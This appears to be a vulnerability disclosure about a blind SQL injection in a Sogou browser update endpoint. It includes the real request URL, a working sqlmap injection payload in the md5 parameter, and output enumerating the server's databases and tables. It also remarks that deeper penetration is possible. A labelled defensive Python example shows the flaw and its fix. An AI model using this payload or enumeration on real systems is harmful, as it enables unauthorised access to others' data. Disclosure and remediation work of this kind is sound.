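SQL injection vulnerability in a Sogou application; one database holds nearly 200 million MD5 values, and I don't know what they are.
After installing the latest version of "Sogou High-Speed Browser", opening it and capturing traffic with Burp, I found that the browser sends an HTTP request to the following address: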
http://tb.sogou.com/insert.php?url=http%3a%2f%2fse.cdn.sogou.com%2fapk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB
The md5 parameter is vulnerable to boolean-based blind injection.
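Added example (not code from the original report or from Sogou): why a concatenated md5 value gives a true/false signal, and how a bound parameter plus an allow-list check removes it. SQLite stands in for the MySQL back end; the table `packages`, its columns and all function names are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

GOOD = "F918BF5773F2FC1569CC1974C1DF5742"  # md5 value from the request on this page
TRUE_PROBE = GOOD + "' AND 6498=6498 AND 'KOBd'='KOBd"   # payload from the sqlmap output
FALSE_PROBE = GOOD + "' AND 6498=6499 AND 'KOBd'='KOBd"  # constructed always-false twin
MD5_RE = re.compile(r"[0-9A-Fa-f]{32}")

def make_db():
    """Constructed stand-in table (assumption: the real schema is not on the page)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE packages (md5 TEXT PRIMARY KEY, size INTEGER)")
    db.execute("INSERT INTO packages VALUES (?, ?)", (GOOD, 2188000))
    return db

def lookup_concat(db, md5):
    """Vulnerable pattern: the parameter is pasted into the SQL text."""
    sql = "SELECT size FROM packages WHERE md5 = '" + md5 + "'"
    return db.execute(sql).fetchone() is not None

def lookup_bound(db, md5):
    """Hardened: the value is bound, so a quote inside it stays data."""
    sql = "SELECT size FROM packages WHERE md5 = ?"
    return db.execute(sql, (md5,)).fetchone() is not None

def valid_md5(value):
    """Allow-list check: exactly 32 hex digits, nothing else."""
    return MD5_RE.fullmatch(value) is not None

def suspicious(url):
    """Log-side check: flag a request whose md5 parameter fails the allow-list."""
    values = parse_qs(urlsplit(url).query).get("md5", [""])
    return not all(valid_md5(v) for v in values)

def demo():
    db = make_db()
    return {
        # (True, False): the result follows the injected condition
        "concat": (lookup_concat(db, TRUE_PROBE), lookup_concat(db, FALSE_PROBE)),
        # (False, False): no row matches the literal string, so no signal leaks
        "bound": (lookup_bound(db, TRUE_PROBE), lookup_bound(db, FALSE_PROBE)),
        "valid": (valid_md5(GOOD), valid_md5(TRUE_PROBE)),
    }

if __name__ == "__main__":
    print(demo())
```

The same allow-list check works at the edge or over access logs, since a legitimate md5 value never contains a quote or a space.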
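Running --count turned up a nagios database, so further penetration should be possible. The p4p database holds nearly 200 million MD5 values; I don't know what they are.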
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: md5
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: url=http://se.cdn.sogou.com/apk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742' AND 6498=6498 AND 'KOBd'='KOBd&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB
---
web application technology: Nginx, PHP 5.1.6
back-end DBMS: MySQL 5
available databases [10]:
[*] geoip
[*] information_schema
[*] ipmap
[*] mysql
[*] nagios
[*] p4p
[*] proxyservers
[*] pxpadmin
[*] server_status
[*] test
Database: geoip
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ip | 77947 |
| cc | 233 |
+---------------------------------------+---------+
Database: nagios
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| nagios_hostchecks | 209759 |
| nagios_timedevents | 55842 |
| nagios_servicechecks | 55703 |
| nagios_logentries | 4999 |
| nagios_systemcommands | 3623 |
| nagios_statehistory | 1248 |
| nagios_host_contacts | 732 |
| nagios_objects | 228 |
| nagios_contact_notificationcommands | 216 |
| nagios_timedeventqueue | 126 |
| nagios_hoststatus | 122 |
| nagios_service_contacts | 116 |
| nagios_configfilevariables | 97 |